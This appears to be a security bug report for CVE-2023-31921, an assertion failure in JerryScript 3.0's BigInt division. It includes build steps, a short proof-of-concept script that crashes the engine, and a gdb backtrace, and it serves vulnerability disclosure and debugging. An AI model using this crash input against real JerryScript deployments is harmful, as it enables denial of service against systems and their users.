CVE-2023-31921: Assertion 'dividend_end_p[0] == divisor_high && dividend_end_p[-1] < divisor_high' failed at /jerryscript/jerry-core/ecma/operations/ecma-big-uint.c(ecma_big_uint_div_mod) · Issue #5068 · jerryscript-

JerryScript 3.0 (commit 05dbbd1) was found to contain an assertion failure in ecma_big_uint_div_mod at jerry-core/ecma/operations/ecma-big-uint.c.


JerryScript revision

Commit: 05dbbd1
Version: v3.0.0

Build platform

Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)

Build steps

python ./tools/build.py --clean --debug --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --compile-flag=-fsanitize=address --compile-flag=-g --strip=off --lto=off --error-messages=on --system-allocator=on --logging=on --line-info=on --stack-limit=20

Test case

// poc.js
var x = BigInt(8 ** 16 + 1);
x ** BigInt(4) / x;

Execution steps & Output

$ ./jerryscript/build/bin/jerry poc.js
ICE: Assertion 'dividend_end_p[0] == divisor_high && dividend_end_p[-1] < divisor_high' failed at /jerryscript/jerry-core/ecma/operations/ecma-big-uint.c(ecma_big_uint_div_mod):1119.
Error: JERRY_FATAL_FAILED_ASSERTION
Aborted

Backtrace

(gdb) #0  0xf7efdd99 in __kernel_vsyscall ()
#1  0xf7bd2276 in raise () from /lib32/libc.so.6
#2  0xf7bba3f7 in abort () from /lib32/libc.so.6
#3  0x083ecca3 in jerry_port_fatal (code=JERRY_FATAL_FAILED_ASSERTION)
    at /jerryscript/jerry-port/common/jerry-port-process.c:29
#4  0x08260d02 in jerry_fatal (code=JERRY_FATAL_FAILED_ASSERTION)
    at /jerryscript/jerry-core/jrt/jrt-fatals.c:63
#5  0x08260d64 in jerry_assert_fail (
    assertion=0x846e200 <str> "dividend_end_p[0] == divisor_high && dividend_end_p[-1] < divisor_high",
    file=0x846d800 <str> "/jerryscript/jerry-core/ecma/operations/ecma-big-uint.c",
    function=0x846e080 <__func__.ecma_big_uint_div_mod> "ecma_big_uint_div_mod", line=1119)
    at /jerryscript/jerry-core/jrt/jrt-fatals.c:83
#6  0x08380b54 in ecma_big_uint_div_mod (dividend_value_p=0xf4203c40,
    divisor_value_p=0xf5600630, is_mod=<optimized out>)
    at /jerryscript/jerry-core/ecma/operations/ecma-big-uint.c:1119
#7  0x081dfc96 in ecma_bigint_div_mod (left_value=4095753286,
    right_value=4116710966, is_mod=<optimized out>)
    at /jerryscript/jerry-core/ecma/operations/ecma-bigint.c:1337
#8  0x082be8b9 in do_number_arithmetic (op=<optimized out>,
    left_value=<optimized out>, right_value=<optimized out>)
    at /jerryscript/jerry-core/vm/opcodes-ecma-arithmetics.c:148
#9  0x082dd6f0 in vm_loop (frame_ctx_p=0xffdc12c0)
    at /jerryscript/jerry-core/vm/vm.c:3563
#10 0x082d6b83 in vm_execute (frame_ctx_p=0xffdc12c0)
    at /jerryscript/jerry-core/vm/vm.c:5211
#11 0x082d4f62 in vm_run (shared_p=0xffdc13d0, this_binding_value=4118822019,
    lex_env_p=0xf56007b0)
    at /jerryscript/jerry-core/vm/vm.c:5312
#12 0x082d4c39 in vm_run_global (bytecode_p=<optimized out>,
    function_object_p=<optimized out>)
    at /jerryscript/jerry-core/vm/vm.c:286
#13 0x0812a4e5 in jerry_run (script=4114614595)
    at /jerryscript/jerry-core/api/jerryscript.c:548
#14 0x083eac3f in jerryx_source_exec_script (
    path_p=0xffdc21e7 "poc.js")
    at /jerryscript/jerry-ext/util/sources.c:68
#15 0x0812162d in main (argc=<optimized out>, argv=<optimized out>)
    at /jerryscript/jerry-main/main-desktop.c:156
(gdb) quit

credits: @EJueon, @Ye0nny of the seclab-yonsei.
